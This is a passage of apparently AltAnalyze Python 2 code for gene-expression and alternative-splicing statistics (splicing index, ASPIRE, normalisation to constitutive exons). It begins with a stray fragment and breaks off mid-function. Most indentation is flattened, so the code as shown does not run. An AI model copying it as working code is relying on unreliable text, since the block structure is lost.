    try:
        out_file.close()
    except Exception:
        pass  # best-effort close, mirroring the file's convention
def performExpressionAnalysis(filename,constitutive_probeset_db,exon_db,annotate_db,dataset_name):
#if analysis_method == 'splicing-index': returnLargeGlobalVars();kill ### used to ensure all large global vars from the reciprocal junction analysis have been cleared from memory
#returnLargeGlobalVars()
"""import list of expression values for arrayids and calculates statistics"""
global fold_dbase; global original_conditions; global normalization_method
stats_dbase = {}; fold_dbase={}; ex_db={}; si_db=[]; bad_row_import = {}; count=0
global array_group_name_db; array_group_name_db = {}
global array_group_db; array_group_db = {};
global array_raw_group_values; array_raw_group_values = {}; global original_array_names; original_array_names=[]
global max_replicates; global equal_replicates; global array_group_list
array_index_list = [] ###Use this list for permutation analysis
fn=filepath(filename); line_num = 1
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line); t = string.split(data,'\t'); probeset = t[0]
if t[0]== '#': null=[] ### Don't import line
elif line_num == 1:
line_num += 1 #makes this value null for the next loop of actual array data
###Below ocucrs if the data is raw opposed to precomputed
if ':' in t[1]:
array_group_list = []; x=0 ###gives us an original index value for each entry in the group
for entry in t[1:]:
original_array_names.append(entry)
aa = string.split(entry,':')
try: array_group,array_name = aa
except Exception: array_name = string.join(aa[1:],':'); array_group = aa[0]
try:
array_group_db[array_group].append(x)
array_group_name_db[array_group].append(array_name)
except KeyError:
array_group_db[array_group] = [x]
array_group_name_db[array_group] = [array_name]
### below only occurs with a new group addition
array_group_list.append(array_group) #use this to generate comparisons in the below linked function
x += 1
else:
#try: print data_type
#except Exception,exception:
#print exception
#print traceback.format_exc()
print_out = 'The AltAnalyze filtered expression file "'+filename+'" is not propperly formatted.\n Review formatting requirements if this file was created by another application.\n'
print_out += "\nFirst line\n"+line
try: UI.WarningWindow(print_out,'Exit'); print print_out
except Exception: print print_out
badExit()
else:
#if probeset in exon_db:
#if exon_db[probeset].GeneID() == 'ENSG00000139970':
###Use the index values from above to assign each expression value to a new database
temp_group_array = {}
line_num+=1
for group in array_group_db:
if count == 0: array_index_list.append(array_group_db[group])
for array_index in array_group_db[group]:
try: exp_val = float(t[array_index+1])
except Exception:
if 'Gene_ID' not in line: bad_row_import[probeset]=line; exp_val = 1
###appended is the numerical expression value for each array in the group (temporary array)
try: temp_group_array[group].append(exp_val) #add 1 since probeset is the first column
except KeyError: temp_group_array[group] = [exp_val]
if count == 0: array_index_list.sort(); count = 1
####store the group database within the probeset database entry
try:
null = exon_db[probeset] ###To conserve memory, don't store any probesets not used for downstream analyses (e.g. not linked to mRNAs)
#if 'ENSG00000139970' in probeset:
#print [max_exp]
#print t[1:];kill
#max_exp = max(map(float, t[1:]))
#if len(array_raw_group_values)>10000: break
#if max_exp>math.log(70,2):
array_raw_group_values[probeset] = temp_group_array
except KeyError:
#print probeset
pass
print len(array_raw_group_values), 'sequence identifiers imported out of', line_num-1
if len(bad_row_import)>0:
print len(bad_row_import), "Rows with an unexplained import error processed and deleted."
print "Example row:"; x=0
for i in bad_row_import:
if x==0: print bad_row_import[i]
try: del array_raw_group_values[i]
except Exception: null=[]
x+=1
### If no gene expression reporting probesets were imported, update constitutive_probeset_db to include all mRNA aligning probesets
cs_genedb={}; missing_genedb={}; addback_genedb={}; rnaseq_cs_gene_db={}
for probeset in constitutive_probeset_db:
gene = constitutive_probeset_db[probeset]
#if gene == 'ENSG00000185008': print [probeset]
try:
null=array_raw_group_values[probeset]; cs_genedb[gene]=[]
if gene == probeset: rnaseq_cs_gene_db[gene]=[] ### If RPKM normalization used, use the gene expression values already calculated
except Exception: missing_genedb[gene]=[] ### Collect possible that are missing from constitutive database (verify next)
for gene in missing_genedb:
try: null=cs_genedb[gene]
except Exception: addback_genedb[gene]=[]
for probeset in array_raw_group_values:
try:
gene = exon_db[probeset].GeneID()
try:
null=addback_genedb[gene]
if 'I' not in probeset and 'U' not in probeset: ### No intron or UTR containing should be used for constitutive expression
null=string.split(probeset,':')
if len(null)<3: ### No trans-gene junctions should be used for constitutive expression
constitutive_probeset_db[probeset]=gene
except Exception: null=[]
except Exception: null=[]
for probeset in constitutive_probeset_db:
gene = constitutive_probeset_db[probeset]
#if gene == 'ENSG00000185008': print [[probeset]]
### Only examine values for associated exons when determining RNASeq constitutive expression (when exon data is present)
normalization_method = 'raw'
if array_type == 'RNASeq':
junction_count=0; constitutive_probeset_db2={}
for uid in constitutive_probeset_db:
if '-' in uid: junction_count+=1
if len(rnaseq_cs_gene_db)>0: ### If filtered RPKM gene-level expression data present, use this instead (and only this)
normalization_method = 'RPKM'
constitutive_probeset_db={} ### Re-set this database
for gene in rnaseq_cs_gene_db:
constitutive_probeset_db[gene]=gene
elif junction_count !=0 and len(constitutive_probeset_db) != junction_count:
### occurs when there is a mix of junction and exon IDs
for uid in constitutive_probeset_db:
if '-' not in uid: constitutive_probeset_db2[uid] = constitutive_probeset_db[uid]
constitutive_probeset_db = constitutive_probeset_db2; constitutive_probeset_db2=[]
"""
for probeset in constitutive_probeset_db:
gene = constitutive_probeset_db[probeset]
if gene == 'ENSG00000185008': print [probeset]
"""
###Build all putative splicing events
global alt_junction_db; global exon_dbase; global critical_exon_db; critical_exon_db={}
if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
### Applies to reciprocal junction analyses only
if array_type == 'AltMouse':
alt_junction_db,critical_exon_db,exon_dbase,exon_inclusion_db,exon_db = ExonAnnotate_module.identifyPutativeSpliceEvents(exon_db,constitutive_probeset_db,array_raw_group_values,agglomerate_inclusion_probesets,onlyAnalyzeJunctions)
print 'Number of Genes with Examined Splice Events:',len(alt_junction_db)
elif (array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null':
from build_scripts import JunctionArray
alt_junction_db,critical_exon_db,exon_dbase,exon_inclusion_db,exon_db = JunctionArray.getPutativeSpliceEvents(species,array_type,exon_db,agglomerate_inclusion_probesets,root_dir)
print 'Number of Genes with Examined Splice Events:',len(alt_junction_db)
#alt_junction_db=[]; critical_exon_db=[]; exon_dbase=[]; exon_inclusion_db=[]
if agglomerate_inclusion_probesets == 'yes':
array_raw_group_values = agglomerateInclusionProbesets(array_raw_group_values,exon_inclusion_db)
exon_inclusion_db=[]
### For datasets with high memory requirements (RNASeq), filter the current and new databases
### Begin this function after agglomeration to ensure agglomerated probesets are considered
reciprocal_probesets = {}
if array_type == 'junction' or array_type == 'RNASeq':
for affygene in alt_junction_db:
for event in alt_junction_db[affygene]:
reciprocal_probesets[event.InclusionProbeset()]=[]
reciprocal_probesets[event.ExclusionProbeset()]=[]
not_evalutated={}
for probeset in array_raw_group_values:
try: null=reciprocal_probesets[probeset]
except Exception:
### Don't remove constitutive probesets
try: null=constitutive_probeset_db[probeset]
except Exception: not_evalutated[probeset]=[]
#print 'Removing',len(not_evalutated),'exon/junction IDs not evaulated for splicing'
for probeset in not_evalutated:
del array_raw_group_values[probeset]
###Check to see if we have precomputed expression data or raw to be analyzed
x=0; y=0; array_raw_group_values2={}; probesets_to_delete=[] ### Record deleted probesets
if len(array_raw_group_values)==0:
print_out = "No genes were considered 'Expressed' based on your input options. Check to make sure that the right species database is indicated and that the right data format has been selected (e.g., non-log versus log expression)."
try: UI.WarningWindow(print_out,'Exit')
except Exception: print print_out; print "Exiting program"
badExit()
elif len(array_raw_group_values)>0:
###array_group_list should already be unique and correctly sorted (see above)
for probeset in array_raw_group_values:
data_lists=[]
for group_name in array_group_list:
data_list = array_raw_group_values[probeset][group_name] ###nested database entry access - baseline expression
if global_addition_factor > 0: data_list = addGlobalFudgeFactor(data_list,'log')
data_lists.append(data_list)
if len(array_group_list)==2:
data_list1 = data_lists[0]; data_list2 = data_lists[-1]; avg1 = statistics.avg(data_list1); avg2 = statistics.avg(data_list2)
log_fold = avg2 - avg1
try:
#t,df,tails = statistics.ttest(data_list1,data_list2,2,3) #unpaired student ttest, calls p_value function
#t = abs(t); df = round(df) #Excel doesn't recognize fractions in a DF
#p = statistics.t_probability(t,df)
p = statistics.runComparisonStatistic(data_list1,data_list2,probability_statistic)
if p == -1:
if len(data_list1)>1 and len(data_list2)>1:
print_out = "The probability statistic selected ("+probability_statistic+") is not compatible with the\nexperimental design. Please consider an alternative statistic or correct the problem.\nExiting AltAnalyze."
try: UI.WarningWindow(print_out,'Exit')
except Exception: print print_out; print "Exiting program"
badExit()
else: p = 1
except Exception: p = 1
fold_dbase[probeset] = [0]; fold_dbase[probeset].append(log_fold)
stats_dbase[probeset]=[avg1]; stats_dbase[probeset].append(p)
###replace entries with the two lists for later permutation analysis
if p == -1: ### should by p == 1: Not sure why this filter was here, but mistakenly removes probesets where there is just one array for each group
del fold_dbase[probeset];del stats_dbase[probeset]; probesets_to_delete.append(probeset); x += 1
if x == 1: print 'Bad data detected...', data_list1, data_list2
elif (avg1 < expression_threshold and avg2 < expression_threshold and p > p_threshold) and array_type != 'RNASeq': ### Inserted a filtering option to exclude small variance, low expreession probesets
del fold_dbase[probeset];del stats_dbase[probeset]; probesets_to_delete.append(probeset); x += 1
else: array_raw_group_values2[probeset] = [data_list1,data_list2]
else: ###Non-junction analysis can handle more than 2 groups
index=0
for data_list in data_lists:
try: array_raw_group_values2[probeset].append(data_list)
except KeyError: array_raw_group_values2[probeset] = [data_list]
if len(array_group_list)>2: ### Thus, there is some variance for this probeset
### Create a complete stats_dbase containing all fold changes
if index==0:
avg_baseline = statistics.avg(data_list); stats_dbase[probeset] = [avg_baseline]
else:
avg_exp = statistics.avg(data_list)
log_fold = avg_exp - avg_baseline
try: fold_dbase[probeset].append(log_fold)
except KeyError: fold_dbase[probeset] = [0,log_fold]
index+=1
if array_type == 'RNASeq': id_name = 'exon/junction IDs'
else: id_name = 'array IDs'
array_raw_group_values = array_raw_group_values2; array_raw_group_values2=[]
print x, id_name,"excluded prior to analysis... predicted not detected"
global original_avg_const_exp_db; global original_fold_dbase
global avg_const_exp_db; global permute_lists; global midas_db
if len(array_raw_group_values)>0:
adj_fold_dbase, nonlog_NI_db, conditions, gene_db, constitutive_gene_db, constitutive_fold_change, original_avg_const_exp_db = constitutive_exp_normalization(fold_dbase,stats_dbase,exon_db,constitutive_probeset_db)
stats_dbase=[] ### No longer needed after this point
original_fold_dbase = fold_dbase; avg_const_exp_db = {}; permute_lists = []; y = 0; original_conditions = conditions; max_replicates,equal_replicates = maxReplicates()
gene_expression_diff_db = constitutive_expression_changes(constitutive_fold_change,annotate_db) ###Add in constitutive fold change filter to assess gene expression for ASPIRE
while conditions > y:
avg_const_exp_db = constitutive_exp_normalization_raw(gene_db,constitutive_gene_db,array_raw_group_values,exon_db,y,avg_const_exp_db); y+=1
#print len(avg_const_exp_db),constitutive_gene_db['ENSMUSG00000054850']
###Export Analysis Results for external splicing analysis (e.g. MiDAS format)
if run_MiDAS == 'yes' and normalization_method != 'RPKM': ### RPKM has negative values which will crash MiDAS
status = ResultsExport_module.exportTransitResults(array_group_list,array_raw_group_values,array_group_name_db,avg_const_exp_db,adj_fold_dbase,exon_db,dataset_name,apt_location)
print "Finished exporting input data for MiDAS analysis"
try: midas_db = ResultsExport_module.importMidasOutput(dataset_name)
except Exception: midas_db = {} ### Occurs if there are not enough samples to calculate a MiDAS p-value
else: midas_db = {}
###Provides all pairwise permuted group comparisons
if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
permute_lists = statistics.permute_arrays(array_index_list)
### Now remove probesets from the analysis that were used to evaluate gene expression
for probeset in constitutive_probeset_db:
try: null = reciprocal_probesets[probeset]
except Exception:
try: del array_raw_group_values[probeset]
except Exception: null=[]
not_evalutated=[]; reciprocal_probesets=[]
constitutive_probeset_db=[]
### Above, all conditions were examined when more than 2 are present... change this so that only the most extreeem are analyzed further
if len(array_group_list)>2 and analysis_method == 'splicing-index' and (array_type == 'exon' or array_type == 'gene' or explicit_data_type != 'null'): ### USED FOR MULTIPLE COMPARISONS
print 'Calculating splicing-index values for multiple group comparisons (please be patient)...',
"""
if len(midas_db)==0:
print_out = 'Warning!!! MiDAS failed to run for multiple groups. Please make\nsure there are biological replicates present for your groups.\nAltAnalyze requires replicates for multi-group (more than two) analyses.'
try: UI.WarningWindow(print_out,'Exit')
except Exception: print print_out; print "Exiting program"
badExit()"""
if filter_for_AS == 'yes':
for probeset in exon_db:
as_call = exon_db[probeset].SplicingCall()
if as_call == 0:
try: del nonlog_NI_db[probeset]
except KeyError: null=[]
if export_NI_values == 'yes':
export_exon_regions = 'yes'
### Currently, we don't deal with raw adjusted expression values, just group, so just export the values for each group
summary_output = root_dir+'AltResults/RawSpliceData/'+species+'/'+analysis_method+'/'+dataset_name[:-1]+'.txt'
print "Exporting all normalized intensities to:\n"+summary_output
adjoutput = export.ExportFile(summary_output)
title = string.join(['Gene\tExonID\tprobesetID']+original_array_names,'\t')+'\n'; adjoutput.write(title)
### Pick which data lists have the most extreem values using the NI_dbase (adjusted folds for each condition)
original_increment = int(len(nonlog_NI_db)/20); increment = original_increment; interaction = 0
for probeset in nonlog_NI_db:
if interaction == increment: increment+=original_increment; print '*',
interaction +=1
geneid = exon_db[probeset].GeneID(); ed = exon_db[probeset]
index=0; NI_list=[] ### Add the group_name to each adj fold value
for NI in nonlog_NI_db[probeset]:
NI_list.append((NI,index)); index+=1 ### setup to sort for the extreeme adj folds and get associated group_name using the index
raw_exp_vals = array_raw_group_values[probeset]
adj_exp_lists={} ### Store the adjusted expression values for each group
if geneid in avg_const_exp_db:
k=0; gi=0; adj_exp_vals = []
for exp_list in raw_exp_vals:
for exp in exp_list:
adj_exp_val = exp-avg_const_exp_db[geneid][k]
try: adj_exp_lists[gi].append(adj_exp_val)
except Exception: adj_exp_lists[gi] = [adj_exp_val]
if export_NI_values == 'yes': adj_exp_vals.append(str(adj_exp_val))
k+=1
gi+=1
if export_NI_values == 'yes':
#print geneid+'-'+probeset, adj_exp_val, [ed.ExonID()];kill
if export_exon_regions == 'yes':
try: ### Thid will only work if ExonRegionID is stored in the abreviated AffyExonSTData object - useful in comparing results between arrays (exon-region centric)
if (array_type == 'exon' or array_type == 'gene') or '-' not in ed.ExonID(): ### only include exon entries not junctions
exon_regions = string.split(ed.ExonRegionID(),'|')
for er in exon_regions:
if len(er)>0: er = er
else:
try: er = ed.ExonID()
except Exception: er = 'NA'
ev = string.join([geneid+'\t'+er+'\t'+probeset]+adj_exp_vals,'\t')+'\n'
if len(filtered_probeset_db)>0:
if probeset in filtered_probeset_db: adjoutput.write(ev) ### This is used when we want to restrict to only probesets known to already by changed
else: adjoutput.write(ev)
except Exception:
ev = string.join([geneid+'\t'+'NA'+'\t'+probeset]+adj_exp_vals,'\t')+'\n'; adjoutput.write(ev)
NI_list.sort()
examine_pairwise_comparisons = 'yes'
if examine_pairwise_comparisons == 'yes':
k1=0; k2=0; filtered_NI_comps = []
NI_list_rev = list(NI_list); NI_list_rev.reverse()
NI1,index1 = NI_list[k1]; NI2,index2 = NI_list_rev[k2]; abs_SI = abs(math.log(NI1/NI2,2))
if abs_SI<alt_exon_logfold_cutoff:
### Indicates that no valid matches were identified - hence, exit loop and return an NI_list with no variance
NI_list = [NI_list[0],NI_list[0]]
else:
### Indicates that no valid matches were identified - hence, exit loop and return an NI_list with no variance
constit_exp1 = original_avg_const_exp_db[geneid][index1]
constit_exp2 = original_avg_const_exp_db[geneid][index2]
ge_fold = constit_exp2-constit_exp1
#print 'original',abs_SI,k1,k2, ge_fold, constit_exp1, constit_exp2
if abs(ge_fold) < log_fold_cutoff: filtered_NI_comps.append([abs_SI,k1,k2])
else:
for i1 in NI_list:
k2=0
for i2 in NI_list_rev:
NI1,index1 = i1; NI2,index2 = i2; abs_SI = abs(math.log(NI1/NI2,2))
#constit_exp1 = original_avg_const_exp_db[geneid][index1]
#constit_exp2 = original_avg_const_exp_db[geneid][index2]
#ge_fold = constit_exp2-constit_exp1
#if abs(ge_fold) < log_fold_cutoff: filtered_NI_comps.append([abs_SI,k1,k2])
#print k1,k2, i1, i2, abs_SI, abs(ge_fold), log_fold_cutoff, alt_exon_logfold_cutoff
if abs_SI<alt_exon_logfold_cutoff: break
else:
constit_exp1 = original_avg_const_exp_db[geneid][index1]
constit_exp2 = original_avg_const_exp_db[geneid][index2]
ge_fold = constit_exp2-constit_exp1
if abs(ge_fold) < log_fold_cutoff:
filtered_NI_comps.append([abs_SI,k1,k2])
#if k1 == 49 or k1 == 50 or k1 == 51: print probeset, abs_SI, k1, k2, abs(ge_fold),log_fold_cutoff, index1, index2, NI1, NI2, constit_exp1,constit_exp2
k2+=1
k1+=1
if len(filtered_NI_comps)>0:
#print filtered_NI_comps
#print NI_list_rev
#print probeset,geneid
#print len(filtered_NI_comps)
#print original_avg_const_exp_db[geneid]
filtered_NI_comps.sort()
si,k1,k2 = filtered_NI_comps[-1]
NI_list = [NI_list[k1],NI_list_rev[k2]]
"""
NI1,index1 = NI_list[0]; NI2,index2 = NI_list[-1]
constit_exp1 = original_avg_const_exp_db[geneid][index1]
constit_exp2 = original_avg_const_exp_db[geneid][index2]
ge_fold = constit_exp2-constit_exp1
print probeset, si, ge_fold, NI_list"""
#print k1,k2;sys.exit()
index1 = NI_list[0][1]; index2 = NI_list[-1][1]
nonlog_NI_db[probeset] = [NI_list[0][0],NI_list[-1][0]] ### Update the values of this dictionary
data_list1 = array_raw_group_values[probeset][index1]; data_list2 = array_raw_group_values[probeset][index2]
avg1 = statistics.avg(data_list1); avg2 = statistics.avg(data_list2); log_fold = avg2 - avg1
group_name1 = array_group_list[index1]; group_name2 = array_group_list[index2]
try:
#t,df,tails = statistics.ttest(data_list1,data_list2,2,3) #unpaired student ttest, calls p_value function
#t = abs(t); df = round(df); ttest_exp_p = statistics.t_probability(t,df)
ttest_exp_p = statistics.runComparisonStatistic(data_list1,data_list2,probability_statistic)
except Exception: ttest_exp_p = 1
fold_dbase[probeset] = [0]; fold_dbase[probeset].append(log_fold)
if ttest_exp_p == -1: del fold_dbase[probeset]; probesets_to_delete.append(probeset); x += 1
elif avg1 < expression_threshold and avg2 < expression_threshold and (ttest_exp_p > p_threshold and ttest_exp_p != 1): ### Inserted a filtering option to exclude small variance, low expreession probesets
del fold_dbase[probeset]; probesets_to_delete.append(probeset); x += 1
else:
constit_exp1 = original_avg_const_exp_db[geneid][index1]
constit_exp2 = original_avg_const_exp_db[geneid][index2]
ge_fold = constit_exp2-constit_exp1
normInt1 = (avg1-constit_exp1); normInt2 = (avg2-constit_exp2)
adj_fold = normInt2 - normInt1
splicing_index = -1*adj_fold; abs_splicing_index = abs(splicing_index)
#print probeset, splicing_index, ge_fold, index1, index2
#normIntList1 = adj_exp_lists[index1]; normIntList2 = adj_exp_lists[index2]
all_nI=[]
for g_index in adj_exp_lists: all_nI.append(adj_exp_lists[g_index])
try: normIntensityP = statistics.OneWayANOVA(all_nI) #[normIntList1,normIntList2] ### This stays an ANOVA independent of the algorithm choosen since groups number > 2
except Exception: normIntensityP = 'NA'
if (normInt1*normInt2)<0: opposite_SI_log_mean = 'yes'
else: opposite_SI_log_mean = 'no'
abs_log_ratio = abs(ge_fold)
if probeset in midas_db:
try: midas_p = float(midas_db[probeset])
except ValueError: midas_p = 'NA'
else: midas_p = 'NA'
#if 'ENSG00000059588' in geneid: print probeset, splicing_index, constit_exp1, constit_exp2, ge_fold,group_name2+'_vs_'+group_name1, index1, index2
if abs_splicing_index>alt_exon_logfold_cutoff and (midas_p < p_threshold or midas_p == 'NA'): #and abs_log_ratio>1 and ttest_exp_p<0.05: ###and ge_threshold_count==2
exonid = ed.ExonID(); critical_exon_list = [1,[exonid]]
ped = ProbesetExpressionData(avg1, avg2, log_fold, adj_fold, ttest_exp_p, group_name2+'_vs_'+group_name1)
sid = ExonData(splicing_index,probeset,critical_exon_list,geneid,normInt1,normInt2,normIntensityP,opposite_SI_log_mean)
sid.setConstitutiveExpression(constit_exp1); sid.setConstitutiveFold(ge_fold); sid.setProbesetExpressionData(ped)
si_db.append((splicing_index,sid))
else:
### Also record the data for probesets that are excluded... Used by DomainGraph
eed = ExcludedExonData(splicing_index,geneid,normIntensityP)
ex_db[probeset] = eed
if array_type == 'RNASeq': id_name = 'exon/junction IDs'
else: id_name = 'array IDs'
print len(si_db),id_name,"with evidence of Alternative expression"
original_fold_dbase = fold_dbase; si_db.sort()
summary_data_db['denominator_exp_events']=len(nonlog_NI_db)
del avg_const_exp_db; del gene_db; del constitutive_gene_db; gene_expression_diff_db={}
if export_NI_values == 'yes': adjoutput.close()
### Above, all conditions were examined when more than 2 are present... change this so that only the most extreeem are analyzed further
elif len(array_group_list)>2 and (array_type == 'junction' or array_type == 'RNASeq' or array_type == 'AltMouse'): ### USED FOR MULTIPLE COMPARISONS
excluded_probeset_db={}
group_sizes = []; original_array_indices = permute_lists[0] ###p[0] is the original organization of the group samples prior to permutation
for group in original_array_indices: group_sizes.append(len(group))
if analysis_method == 'linearregres': ### For linear regression, these scores are non-long
original_array_raw_group_values = copy.deepcopy(array_raw_group_values)
for probeset in array_raw_group_values:
ls_concatenated=[]
for group in array_raw_group_values[probeset]: ls_concatenated+=group
ls_concatenated = statistics.log_fold_conversion_fraction(ls_concatenated)
array_raw_group_values[probeset] = ls_concatenated
pos1=0; pos2=0; positions=[]
for group in group_sizes:
if pos1 == 0: pos2 = group; positions.append((pos1,pos2))
else: pos2 = pos1+group; positions.append((pos1,pos2))
pos1 = pos2
if export_NI_values == 'yes':
export_exon_regions = 'yes'
### Currently, we don't deal with raw adjusted expression values, just group, so just export the values for each group
summary_output = root_dir+'AltResults/RawSpliceData/'+species+'/'+analysis_method+'/'+dataset_name[:-1]+'.txt'
print "Exporting all normalized intensities to:\n"+summary_output
adjoutput = export.ExportFile(summary_output)
title = string.join(['gene\tprobesets\tExonRegion']+original_array_names,'\t')+'\n'; adjoutput.write(title)
events_examined= 0; denominator_events=0; fold_dbase=[]; adj_fold_dbase=[]; scores_examined=0
splice_event_list=[]; splice_event_list_mx=[]; splice_event_list_non_mx=[]; event_mx_temp = []; permute_p_values={}; probeset_comp_db={}#use this to exclude duplicate mx events
for geneid in alt_junction_db:
affygene = geneid
for event in alt_junction_db[geneid]:
if array_type == 'AltMouse':
#event = [('ei', 'E16-E17'), ('ex', 'E16-E18')]
#critical_exon_db[affygene,tuple(critical_exons)] = [1,'E'+str(e1a),'E'+str(e2b)] --- affygene,tuple(event) == key, 1 indicates both are either up or down together
event_call = event[0][0] + '-' + event[1][0]
exon_set1 = event[0][1]; exon_set2 = event[1][1]
probeset1 = exon_dbase[affygene,exon_set1]
probeset2 = exon_dbase[affygene,exon_set2]
critical_exon_list = critical_exon_db[affygene,tuple(event)]
if array_type == 'junction' or array_type == 'RNASeq':
event_call = 'ei-ex' ### Below objects from JunctionArrayEnsemblRules - class JunctionInformation
probeset1 = event.InclusionProbeset(); probeset2 = event.ExclusionProbeset()
exon_set1 = event.InclusionJunction(); exon_set2 = event.ExclusionJunction()
try: novel_event = event.NovelEvent()
except Exception: novel_event = 'known'
critical_exon_list = [1,event.CriticalExonSets()]
key,jd = formatJunctionData([probeset1,probeset2],geneid,critical_exon_list[1])
if array_type == 'junction' or array_type == 'RNASeq':
try: jd.setSymbol(annotate_db[geneid].Symbol())
except Exception: null=[]
#if '|' in probeset1: print probeset1, key,jd.InclusionDisplay();kill
probeset_comp_db[key] = jd ### This is used for the permutation analysis and domain/mirBS import
dI_scores=[]
if probeset1 in nonlog_NI_db and probeset2 in nonlog_NI_db and probeset1 in array_raw_group_values and probeset2 in array_raw_group_values:
events_examined+=1
if analysis_method == 'ASPIRE':
index1=0; NI_list1=[]; NI_list2=[] ### Add the group_name to each adj fold value
for NI in nonlog_NI_db[probeset1]: NI_list1.append(NI)
for NI in nonlog_NI_db[probeset2]: NI_list2.append(NI)
for NI1_g1 in NI_list1:
NI2_g1 = NI_list2[index1]; index2=0
for NI1_g2 in NI_list1:
try: NI2_g2 = NI_list2[index2]
except Exception: print index1, index2, NI_list1, NI_list2;kill
if index1 != index2:
b1 = NI1_g1; e1 = NI1_g2
b2 = NI2_g1; e2 = NI2_g2
try:
dI = statistics.aspire_stringent(b1,e1,b2,e2); Rin = b1/e1; Rex = b2/e2
if (Rin>1 and Rex<1) or (Rin<1 and Rex>1):
if dI<0: i1,i2 = index2,index1 ### all scores should indicate upregulation
else: i1,i2=index1,index2
dI_scores.append((abs(dI),i1,i2))
except Exception:
#if array_type != 'RNASeq': ### RNASeq has counts of zero and one that can cause the same result between groups and probesets
#print probeset1, probeset2, b1, e1, b2, e2, index1, index2, events_examined;kill
### Exception - Occurs for RNA-Seq but can occur for array data under extreemly rare circumstances (Rex=Rin even when different b1,e1 and b2,ed values)
null=[]
index2+=1
index1+=1
dI_scores.sort()
if analysis_method == 'linearregres':
log_fold,i1,i2 = getAllPossibleLinearRegressionScores(probeset1,probeset2,positions,group_sizes)
dI_scores.append((log_fold,i1,i2))
raw_exp_vals1 = original_array_raw_group_values[probeset1]; raw_exp_vals2 = original_array_raw_group_values[probeset2]
else: raw_exp_vals1 = array_raw_group_values[probeset1]; raw_exp_vals2 = array_raw_group_values[probeset2]
adj_exp_lists1={}; adj_exp_lists2={} ### Store the adjusted expression values for each group
if geneid in avg_const_exp_db:
gi=0; l=0; adj_exp_vals = []; anova_test=[]
for exp_list in raw_exp_vals1:
k=0; anova_group=[]
for exp in exp_list:
adj_exp_val1 = exp-avg_const_exp_db[geneid][l]
try: adj_exp_lists1[gi].append(adj_exp_val1)
except Exception: adj_exp_lists1[gi] = [adj_exp_val1]
adj_exp_val2 = raw_exp_vals2[gi][k]-avg_const_exp_db[geneid][l]
try: adj_exp_lists2[gi].append(adj_exp_val2)
except Exception: adj_exp_lists2[gi] = [adj_exp_val2]
anova_group.append(adj_exp_val2-adj_exp_val1)
if export_NI_values == 'yes':
#if analysis_method == 'ASPIRE':
adj_exp_vals.append(str(adj_exp_val2-adj_exp_val1))
### BELOW CODE PRODUCES THE SAME RESULT!!!!
"""folds1 = statistics.log_fold_conversion_fraction([exp])
folds2 = statistics.log_fold_conversion_fraction([raw_exp_vals2[gi][k]])
lr_score = statistics.convert_to_log_fold(statistics.simpleLinRegress(folds1,folds2))
adj_exp_vals.append(str(lr_score))"""
k+=1; l+=0
gi+=1; anova_test.append(anova_group)
if export_NI_values == 'yes':
if export_exon_regions == 'yes':
exon_regions = string.join(critical_exon_list[1],'|')
exon_regions = string.split(exon_regions,'|')
for er in exon_regions:
ev = string.join([geneid+'\t'+probeset1+'-'+probeset2+'\t'+er]+adj_exp_vals,'\t')+'\n'
if len(filtered_probeset_db)>0:
if probeset1 in filtered_probeset_db and probeset2 in filtered_probeset_db:
adjoutput.write(ev) ### This is used when we want to restrict to only probesets known to already by changed
else: adjoutput.write(ev)
try: anovaNIp = statistics.OneWayANOVA(anova_test) ### This stays an ANOVA independent of the algorithm choosen since groups number > 2
except Exception: anovaNIp='NA'
if len(dI_scores)>0 and geneid in avg_const_exp_db:
dI,index1,index2 = dI_scores[-1]; count=0
probesets = [probeset1, probeset2]; index=0
key,jd = formatJunctionData([probeset1,probeset2],affygene,critical_exon_list[1])
if array_type == 'junction' or array_type == 'RNASeq':
try: jd.setSymbol(annotate_db[affygene].Symbol())
except Exception:null=[]
probeset_comp_db[key] = jd ### This is used for the permutation analysis and domain/mirBS import
if max_replicates >2 or equal_replicates==2: permute_p_values[(probeset1,probeset2)] = [anovaNIp, 'NA', 'NA', 'NA']
index=0
for probeset in probesets:
if analysis_method == 'linearregres':
data_list1 = original_array_raw_group_values[probeset][index1]; data_list2 = original_array_raw_group_values[probeset][index2]
else: data_list1 = array_raw_group_values[probeset][index1]; data_list2 = array_raw_group_values[probeset][index2]
baseline_exp = statistics.avg(data_list1); experimental_exp = statistics.avg(data_list2); fold_change = experimental_exp - baseline_exp
group_name1 = array_group_list[index1]; group_name2 = array_group_list[index2]
try:
ttest_exp_p = statistics.runComparisonStatistic(data_list1,data_list2,probability_statistic)
except Exception: ttest_exp_p = 'NA'
if ttest_exp_p==1: ttest_exp_p = 'NA'
if index == 0:
try: adj_fold = statistics.avg(adj_exp_lists1[index2]) - statistics.avg(adj_exp_lists1[index1])
except Exception:
print raw_exp_vals1,raw_exp_vals2, avg_const_exp_db[geneid]
print probeset,probesets,adj_exp_lists1,adj_exp_lists2,index1,index2;kill
ped1 = ProbesetExpressionData(baseline_exp, experimental_exp, fold_change, adj_fold, ttest_exp_p, group_name2+'_vs_'+group_name1)
else:
adj_fold = statistics.avg(adj_exp_lists2[index2]) - statistics.avg(adj_exp_lists2[index1])
ped2 = ProbesetExpressionData(baseline_exp, experimental_exp, fold_change, adj_fold, ttest_exp_p, group_name2+'_vs_'+group_name1)
constit_exp1 = original_avg_const_exp_db[geneid][index1]
constit_exp2 = original_avg_const_exp_db[geneid][index2]
ge_fold = constit_exp2-constit_exp1
index+=1
try:
pp1 = statistics.runComparisonStatistic(adj_exp_lists1[index1], adj_exp_lists1[index2],probability_statistic)
pp2 = statistics.runComparisonStatistic(adj_exp_lists2[index1], adj_exp_lists2[index2],probability_statistic)
except Exception: pp1 = 'NA'; pp2 = 'NA'
if analysis_method == 'ASPIRE' and len(dI_scores)>0:
p1 = JunctionExpressionData(adj_exp_lists1[index1], adj_exp_lists1[index2], pp1, ped1)
p2 = JunctionExpressionData(adj_exp_lists2[index1], adj_exp_lists2[index2], pp2, ped2)
### ANOVA p-replaces the below p-value
"""try: baseline_scores, exp_scores, pairwiseNIp = calculateAllASPIREScores(p1,p2)
except Exception: baseline_scores = [0]; exp_scores=[dI]; pairwiseNIp = 0 """
#if pairwiseNIp == 'NA': pairwiseNIp = 0 ### probably comment out
if len(dI_scores)>0:
scores_examined+=1
if probeset in midas_db:
try: midas_p = float(midas_db[probeset])
